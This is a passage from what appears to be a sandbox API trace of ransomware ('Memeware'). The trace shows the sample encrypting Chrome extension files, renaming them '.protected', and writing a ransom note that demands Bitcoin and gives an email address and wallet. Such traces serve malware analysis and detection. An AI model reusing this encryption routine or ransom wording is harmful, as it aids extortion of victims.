lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.459] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.459] CloseHandle (hObject=0x168) returned 1 [0079.459] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.protected") returned 169 [0079.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0079.460] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.460] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.460] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 163 [0079.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.460] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.460] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.461] lstrlenA (lpString="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") returned 684 [0079.461] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.461] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.461] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.461] CloseHandle (hObject=0x164) returned 1 [0079.461] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.461] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0079.462] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0079.462] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0079.462] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0079.462] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0079.462] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro") returned 142 [0079.462] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0079.462] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0079.462] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\*") returned 144 [0079.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.462] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.462] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.462] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.462] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.462] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.462] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\.") returned 144 [0079.462] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.462] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.462] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.462] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.462] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.462] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.462] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.462] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\..") returned 145 [0079.462] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.463] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.463] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.463] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0079.463] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.463] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.463] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.463] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.463] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json") returned 156 [0079.463] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.463] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.463] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.463] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json") returned 156 [0079.464] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.464] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json") returned 156 [0079.464] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json") returned 156 [0079.464] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.464] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0079.465] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.465] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0079.466] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.466] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.466] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.466] CloseHandle (hObject=0x168) returned 1 [0079.466] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.protected") returned 166 [0079.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.protected")) returned 1 [0079.467] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.467] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.467] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\RESTORE_FILES.txt") returned 160 [0079.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0079.468] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.468] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.468] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.469] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.469] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.469] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.469] CloseHandle (hObject=0x164) returned 1 [0079.469] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0079.469] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0079.469] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru") returned 142 [0079.469] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0079.469] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0079.469] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\*") returned 144 [0079.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.470] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.470] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.470] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.470] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.470] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.470] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\.") returned 144 [0079.470] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.470] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.470] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.470] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.470] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.470] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.470] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.470] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\..") returned 145 [0079.470] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.470] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.470] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.470] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.470] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json") returned 156 [0079.470] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.470] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.470] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.470] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.471] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json") returned 156 [0079.471] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.471] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json") returned 156 [0079.471] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.471] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json") returned 156 [0079.471] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.471] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x152, lpOverlapped=0x0) returned 1 [0079.472] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.472] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x152, lpOverlapped=0x0) returned 1 
[0079.472] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.472] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.472] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.473] CloseHandle (hObject=0x168) returned 1 [0079.473] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.protected") returned 166 [0079.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.protected")) returned 1 [0079.473] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.474] FindClose (in: hFindFile=0x47bc10 | out: 